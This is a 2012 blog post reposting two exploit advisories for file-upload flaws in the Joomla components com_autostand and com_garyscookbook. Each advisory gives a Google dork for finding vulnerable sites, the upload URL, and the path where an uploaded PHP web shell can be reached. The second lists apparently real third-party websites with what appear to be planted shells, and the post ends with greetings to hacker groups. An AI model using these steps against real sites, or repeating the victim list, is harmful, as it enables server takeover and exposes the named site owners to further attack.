Pages

Friday, November 16, 2012

Joomla EXploit


# Exploit Title:  joomla com_autostand file upload
# Author: Over-X
# email: j1a@hotmail.de
# Vendor or Software Link: forum.joomla.org
# Version: v3
# Google dork: "inurl:com_autostand"
# Tested on: win Xp
-------------------------------------------------------------------------------
poc:
----
localhost/path/index.php?option=com_autostand&func=newItem
upload shell php and go 2 :
--------------------------
localhost/path/images/autostand/images/shell.php
examples:
---------------------------------------------------------------------------------------
Gre: Sec4ever.com & Damane2011 & Invectus & Kha&mix & 4chrf & ked Ans & Black_Specter &
ms_dz & indoushka & jago-dz & L3b r1z & b0x & scorpion_tn


#Exploit Title: joomla com_garyscookbook file upload
# Author: Over-X
# email: j1a@hotmail.de
# Vendor or Software Link: www.joomla.it
# Version: 2_4_2
# Google dork: "inurl:com_garyscookbook"
# Tested on: win Xp ------------------------------------------------------------------------------- poc: ---- localhost/path/index.php?option=com_garyscookbook&func=newItem
upload shell php and go 2 :
--------------------------
localhost/path/components/com_garyscookbook/img_pictures/shell.php
1) http://www.kouzinapapanagiotou.gr/in...k&func=newItem
http://www.kouzinapapanagiotou.gr//c...es/dz-hp-0.php
2) http://oneiron.gr/index.php?option=c...k&func=newItem
http://oneiron.gr/components/com_gar.../dzdz-hp-0.php

3 ) https://www.vitamix.co.uk/index.php?...k&func=newItem
https://www.vitamix.co.uk//component...tures/help.php
--------------------------------------------------------------------------------
Gre: Sec4ever.com & Damane2011 & Invectus & Kha&mix & ked Ans & Black_Specter
ms_dz & indoushka & jago-dz & L3b r1z & b0x 
source : 1337day.com

No comments:

Post a Comment